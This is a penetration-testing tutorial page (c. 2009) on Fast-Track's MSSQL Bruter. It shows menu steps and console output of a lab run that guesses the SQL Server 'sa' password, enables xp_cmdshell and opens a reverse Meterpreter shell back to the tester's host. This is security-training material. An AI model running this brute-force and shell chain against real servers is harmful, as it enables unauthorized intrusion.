MSSQL Bruter

Probably one of my favorite aspects of Fast-Track is the MSSQL Bruter. It is probably one of the most robust and unique MSSQL bruters on the market today. When performing internal penetration tests, you often find that MSSQL "sa" passwords are often overlooked. First, a brief history behind these "sa" accounts is in order.

The "sa" account is the system administrator account for MSSQL and when using "Mixed Mode" or "SQL Authentication", the SQL "sa" account automatically gets created. Administrators have to enter a password when creating these accounts and often leave these as weak passwords.

Fast-Track attacks this weakness and attempts to identify SQL servers with weak "sa" accounts. Once these passwords have been guessed, Fast-Track will deliver whatever payload you want through an advanced hex to binary conversion utilizing windows debug. Let's scan a class C address space for SQL servers. One thing to note when going through these steps is that you will be prompted if you want to perform advanced SQL discovery.

In order to explain this, you first need to understand default installations of SQL Servers. When installing SQL Server, by default it will install SQL on TCP Port 1433. In SQL Server 2005+, you can specify dynamic port allocation which will make the number somewhat random and hard to identify. Luckily for us, SQL server also installs port 1434 UDP which tells us what TCP port the SQL server is running on. When performing the advanced identification, Fast-Track will utilize the Metasploit auxiliary module to query port 1433 for the ports, otherwise Fast-Track will only end up scanning for port 1433. Let's look at the SQL Bruter. Note that by specifying the advanced discovery, it takes significantly longer than if you specify no.

Fast-Track Main Menu:

    Fast-Track - Where it's OK to finish in under 3 minutes...
    Version: v4.0
    Written by: David Kennedy (ReL1K)
    http://www.securestate.com
    http://www.thepentest.com

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Microsoft SQL Tools
    4.  Mass Client-Side Attack
    5.  Exploits
    6.  Binary to Hex Payload Converter
    7.  Payload Generator
    8.  Fast-Track Tutorials
    9.  Fast-Track Changelog
    10. Fast-Track Credits
    11. Exit

    Enter the number: 3

Microsoft SQL Attack Tools

Pick a list of the tools from below:

1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage

Enter your choice : 2

  Enter the IP Address and Port Number to Attack.

  Options: (a)ttempt SQL Ping and Auto Quick Brute Force
           (m)ass scan and dictionary brute
           (s)ingle Target (Attack a Single Target with big dictionary)
           (f)ind SQL Ports (SQL Ping)
           (i) want a command prompt and know which system is vulnerable
           (v)ulnerable system, I want to add a local admin on the box...
           (e)nable xp_cmdshell if its disabled (sql2k and sql2k5)

  Enter Option:

Fast-Track has a great list of options so let's take a look at each of them:

Option 'a', 'attempt SQL Ping and Auto Quick Brute Force', will attempt to scan a range of IP addresses. This uses the same syntax as Nmap and uses a built-in pre-defined dictionary list of about fifty passwords.

Option 'm', 'mass scan and dictionary brute', will scan a range of IP addresses and allow you to specify a word list of your own. Fast-Track does come with a decent word list located in 'bin/dict' though.

Option 's', 'single Target (Attack a Single Target with big dictionary', will allow you to brute force 1 specific IP address with a large word list.

Option 'f', 'find SQL Ports (SQL Ping)', will only look for SQL servers and not attack them.

Option 'i', 'i want a command prompt and know which system is vulnerable', will spawn a command prompt for you if you already know the "sa" password.

Option 'v', 'vulnerable system, I want to add a local admin on the box...', will add a new administrative user on a box that you know to be vulnerable.

Option 'e', 'enable xp_cmdshell if its disabled (sql2k and sql2k5)', is a stored procedure Fast-Track utilizes in order to execute underlying system commands. By default, it is disabled in SQL Server 2005 and above but Fast-Track can automatically re-enable it if it has been disabled. Just a good thing to mention, when attacking the remote system with any of the options, Fast-Track will automatically attempt to re-enable xp_cmdshell just in case.

Let's run through the Quick Brute Force.

Enter the IP Address and Port Number to Attack.

  Options: (a)ttempt SQL Ping and Auto Quick Brute Force
           (m)ass scan and dictionary brute
           (s)ingle Target (Attack a Single Target with big dictionary)
           (f)ind SQL Ports (SQL Ping)
           (i) want a command prompt and know which system is vulnerable
           (v)ulnerable system, I want to add a local admin on the box...
           (e)nable xp_cmdshell if its disabled (sql2k and sql2k5)

  Enter Option: a
Enter username for SQL database (example:sa): sa
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Setting default directory...
Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255): 10.211.55.1/24

Do you want to perform advanced SQL server identification on non-standard SQL ports? This will use UDP footprinting in order to determine where the SQL servers are at. This could take quite a long time.

Do you want to perform advanced identification, yes or no: yes

[-] Launching SQL Ping, this may take a while to footprint.... [-]

[*] Please wait while we load the module tree...
Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP 10.211.55.128:1433
Brute forcing password of  on IP 10.211.55.128:1433
Brute forcing password of password on IP 10.211.55.128:1433

SQL Server Compromised: "sa" with password of: "password" on IP 10.211.55.128:1433

Brute forcing password of sqlserver on IP 10.211.55.128:1433
Brute forcing password of sql on IP 10.211.55.128:1433
Brute forcing password of password1 on IP 10.211.55.128:1433
Brute forcing password of password123 on IP 10.211.55.128:1433
Brute forcing password of complexpassword on IP 10.211.55.128:1433
Brute forcing password of database on IP 10.211.55.128:1433
Brute forcing password of server on IP 10.211.55.128:1433
Brute forcing password of changeme on IP 10.211.55.128:1433
Brute forcing password of change on IP 10.211.55.128:1433
Brute forcing password of sqlserver2000 on IP 10.211.55.128:1433
Brute forcing password of sqlserver2005 on IP 10.211.55.128:1433
Brute forcing password of Sqlserver on IP 10.211.55.128:1433
Brute forcing password of SqlServer on IP 10.211.55.128:1433
Brute forcing password of Password1 on IP 10.211.55.128:1433

Brute forcing password of xp on IP 10.211.55.128:1433
Brute forcing password of nt on IP 10.211.55.128:1433
Brute forcing password of 98 on IP 10.211.55.128:1433
Brute forcing password of 95 on IP 10.211.55.128:1433
Brute forcing password of 2003 on IP 10.211.55.128:1433
Brute forcing password of 2008 on IP 10.211.55.128:1433

*******************************************
The following SQL Servers were compromised:
*******************************************

1. 10.211.55.128:1433 *** U/N: sa P/W: password ***

*******************************************

To interact with system, enter the SQL Server number.

Example: 1. 192.168.1.32 you would type 1

Enter the number:

Looking at the output above, we have compromised an SQL server at IP address 10.211.55.128 on port 1433 with username "sa" and password "password". We now want full access to this bad boy. There are a lot of options we can specify and in this case, we'll use a Meterpreter console but there are various other options available to you.

Enter number here: 1

Enabling: XP_Cmdshell...
Finished trying to re-enable xp_cmdshell stored procedure if disabled.

Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Setting default directory...
What port do you want the payload to connect to you on: 4444
Metasploit Reverse Meterpreter Upload Detected..
Launching Meterpreter Handler.
Creating Metasploit Reverse Meterpreter Payload..
Sending payload: c88f3f9ac4bbe0e66da147e0f96efd48dad6
Sending payload: ac8cbc47714aaeed2672d69e251cee3dfbad
Metasploit payload delivered..
Converting our payload to binary, this may take a few...
Cleaning up...
Launching payload, this could take up to a minute...
When finished, close the metasploit handler window to return to other compromised SQL Servers.
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:4444 -> 10.211.55.128:1030)

meterpreter >

Success! We now have full access to this machine. Pretty wicked stuff, and all through guessing the SQL "sa" account.

© Offensive Security 2009

Username
Password
Remember me

System message

MSSQL Bruter

MSSQL Bruter